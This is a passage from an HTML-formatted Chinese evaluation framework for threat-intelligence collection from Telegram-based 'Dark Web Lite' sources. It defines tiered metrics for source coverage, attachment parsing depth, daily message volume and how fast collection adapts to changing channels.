leaf="">威胁源群组和频道数量 &gt; 100</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源群组和频道数量 &gt; 1000</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源群组和频道数量 &gt; 5000</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估对网络安全相关网络犯罪生态中 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite 威胁源的覆盖范围</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。通过量化</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">威胁源群组和频道数量</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，可客观反映在 Dark Web Lite 领域的采集覆盖能力，为后续内容解析、情报分析与风险预警提供重要的数据支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">4.2.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">威胁源采集内容解析度</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4.2.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集内容解析度是</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite 威胁源采集能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">重要评估维度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其核心设计目的在于：</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">衡量对采集所得情报内容的处理深度，尤其针对多媒体元素的获取与解析能力。</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Dark Web Lite 生态内的高价值威胁情报，常以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">消息、图片、附件</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等多元形态发布。若仅能采集文本消息，无法对附件或多媒体内容开展有效解析与提取，将直接造成</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">情报完整性缺失</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，难以全面掌握威胁核心细节，进而影响后续风险评估与响应决策的科学性与准确性。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标重点考察采集环节对</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">多媒体内容</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的处理能力，该项能力</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">直接关系到情报的可用性与分析深度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，可为安全运营工作提供更全面、更具实战价值的数据支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4.2.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据主要结合</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite 威胁源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的内容发布特征与实际采集需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Dark Web Lite 中的高价值情报常以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">消息、图片、Excel、压缩包</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等附件形式发布，此类非结构化多媒体载体中往往包含大量</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">受影响主体的实体信息</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，如域名、邮箱、账号等关键内容。但在实际采集作业中，全量下载所有附件难以落地执行，原因在于部分合集打包文件体积庞大，可达数十 GB、上百 GB 乃至 TB 级别，不仅会大幅提升存储成本，还会显著提高被社群管理者发现并封禁的风险。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本框架以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">多媒体内容解析深度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为量化标准，重点评估对小文件与附件的自动采集能力，以及对超大附件的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">地址记录与精准定位能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。通过该分级设计，既可保障情报获取的完整性，又能兼顾实际采集的可行性与安全性，为后续</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">向量检索、知识图谱构建及风险预警</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">提供可靠的数据支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4.2.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集内容解析度以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">多媒体内容的处理深度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="163" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="278" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="127" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="163" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集内容解析度</span></span></p></td><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">采集消息</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">采集消息，识别和定位消息附件</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">采集消息，自动下载小附件，识别和定位超大附件</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估对 Dark Web Lite 威胁源中多媒体内容的采集处理能力。</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">优秀级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">要求能够</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">自动下载小附件并识别定位超大附件，良好级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">要求能够</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">识别和定位消息附件，基础级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">则仅能</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">采集消息文本</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。通过该量化标准，可客观反映采集过程中的内容完整性，为后续情报分析和风险预警提供重要支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">4.3.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">威胁源采集量</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4.3.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集量是</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite 威胁源采集能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">核心量化指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其核心设计目的在于：</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评估对网络安全相关网络犯罪生态中 Dark Web Lite 威胁源的每日情报获取规模</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Dark Web Lite 生态内的高价值威胁情报以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">消息形态</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">高速产生与传播。若采集量不足，则难以覆盖足够规模的威胁源，极易造成</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">重要数据泄露、IAB 交易、窃密日志</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等关键情报漏报，直接影响相关主体在威胁发生早期阶段的发现与响应能力。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，威胁源采集量</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">直接决定能否全面、及时掌握 Dark Web Lite 中的网络安全威胁动态</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为后续情报分析、风险预警与应急处置提供</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">充足、可靠的数据基础</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4.3.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据主要结合</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite 威胁源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的消息发布特征与实际采集需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Dark Web Lite 中的网络安全相关网络犯罪生态威胁源以</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Telegram 群组与频道</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">为主要承载载体，具备消息产生速率快、总体规模庞大的特征，高价值情报通常以高频消息形式出现。因此，本框架以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">每日消息数量</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化标准，用以评估对 Dark Web Lite 威胁源的采集规模。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标分级设计综合考虑 Dark Web Lite 生态中网络安全相关威胁源的实际消息产出规模，以及不同能力层级在采集总量上的差异化表现。通过设定科学合理的量化阈值，确保指标兼具科学性与可操作性，能够客观体现采集能力在消息处理规模上的真实差距。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4.3.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集量以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">每日消息数量</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="163" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="278" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="127" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="163" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集量</span></span></p></td><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">每日消息数量 &gt; 10,000</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">每日消息数量 &gt; 100,000</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">每日消息数量 &gt; 1,000,000</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估对 Dark Web Lite 威胁源的每日情报获取规模。通过量化每日消息采集数量，可客观反映在 Dark Web Lite 领域的采集能力，为后续情报分析、风险预警和应急处置提供重要数据支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">4.4.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">威胁源采集效果优化</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4.4.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集效果优化是</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite 威胁源采集能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">重要保障性指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其核心设计目的在于：</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评估在面对威胁源波动或新源发现时的快速适配与优化能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Dark Web Lite 生态内的威胁源具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高波动性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">特征，群组与频道频繁出现迁移、封禁及新源创建等情形。若无法快速完成采集适配与优化，将直接引发情报采集中断或覆盖缺失，进而影响对网络安全相关威胁的及时发现与持续监测。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标通过量化</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">旧源波动或新源发现后的采集优化时间</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，客观反映动态环境下的适配能力与采集稳定性，为 Dark Web Lite 威胁源采集的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">长期可靠性与连续性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">提供重要技术支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4.4.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据主要结合</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite 威胁源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的高波动性特征与实际采集需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Dark Web Lite 中的群组与频道迭代迅速，频繁因执法行动、管理封禁、地址迁移或新源创建而产生波动。若无法及时开展采集优化，将直接导致情报覆盖中断或数据缺失。因此，本框架以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">旧源波动或新源发现时的采集优化时间</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化标准，用以评估动态环境下的适配能力。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标分级设计综合考虑以下因素：一是</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite 威胁源快速迭代与波动频率</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">；二是不同能力层级在采集优化速度上的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">差异化表现</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">；三是该项能力对整体采集</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">连续性与稳定性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span 